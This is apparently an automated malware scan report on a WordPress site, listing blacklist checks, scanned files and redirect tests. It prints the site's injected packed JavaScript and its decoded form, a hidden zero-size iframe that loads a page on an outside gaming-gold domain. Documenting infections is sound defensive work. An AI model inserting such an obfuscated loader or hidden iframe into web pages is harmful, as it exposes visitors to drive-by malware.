Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=babiandsanfield.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://babiandsanfield.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.babiandsanfield.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Tue, 16 Sep 2014 01:31:36 GMT Age: 1 Location: http://www.babisanfield.com Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.babisanfield.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 16 Sep 2014 01:31:38 GMT Location: http://babisanfield.com/ Server: nginx/1.6.1 Vary: Cookie Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://babisanfield.com/xmlrpc.php | clean |
http://babisanfield.com/ | 200 OK Content-Length: 29576 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 c="x+/=";7 1="z/B=";7 5="";7 j,k,e,d,a,8,b="";7 i=0;7 t=/[^A-q-p-9\\+\\/\\=]/g;1=1.D(/[^A-q-p-9\\+\\/\\=]/g,"");s{d=c.f(1.h(i++));a=c.f(1.h(i++));8=c.f(1.h(i++)); Decoded script: var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var s5fA="PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA/c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var P3yL="";var wzQl,DwS9,EqVD,aiJg,ZEPX,toUe,K0oj="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;s5fA=s5fA.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{aiJg=k0e0y0S.indexOf(s5fA.charAt(i++));ZEPX=k0e0y0S.indexOf(s5fA.charAt(i++));toUe=k0e0y0S.indexOf(s5fA.charAt(i++)); <iframe src="http://wow-gamegold.com/photos/go.php?sid=2" width="0" height="0" frameborder="0"></iframe> Antivirus reports:
| ||
http://babisanfield.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-content/themes/Classy/js/custom.js?ver=3.7.1 | 200 OK Content-Length: 16536 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-content/themes/Classy/js/jquery.prettyPhoto.js?ver=3.7.1 | 200 OK Content-Length: 21861 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-includes/js/comment-reply.min.js?ver=3.7.1 | 200 OK Content-Length: 753 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-content/themes/Classy/js/jquery.easing.1.3.js?ver=3.7.1 | 200 OK Content-Length: 5368 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.45.0-2013.10.17 | 200 OK Content-Length: 14723 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.5.4 | 200 OK Content-Length: 8326 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-content/plugins/wp-rss-multi-importer/scripts/show-excerpt.js?ver=3.7.1 | 200 OK Content-Length: 473 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-content/plugins/wp-rss-multi-importer/scripts/jquery.colorbox-min.js?ver=3.7.1 | 200 OK Content-Length: 10996 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-content/plugins/wp-rss-multi-importer/scripts/detect-mobile.js?ver=3.7.1 | 200 OK Content-Length: 2546 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-content/plugins/wp-rss-multi-importer/scripts/scroll/jquery-ui-1.8.23.custom.js?ver=3.7.1 | 200 OK Content-Length: 20343 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-content/plugins/wp-rss-multi-importer/scripts/scroll/jquery.mousewheel.min.js?ver=3.7.1 | 200 OK Content-Length: 1392 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-content/plugins/wp-rss-multi-importer/scripts/scroll/jquery.kinetic.js?ver=3.7.1 | 200 OK Content-Length: 11176 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: babiandsanfield.com
Result:
GET / HTTP/1.1
Host: babiandsanfield.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: babiandsanfield.com
Referer: http://www.google.com/search?q=babiandsanfield.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: babiandsanfield.com
Referer: http://www.google.com/search?q=babiandsanfield.com
Result:
The result is similar to the first query. There are no suspicious redirects found.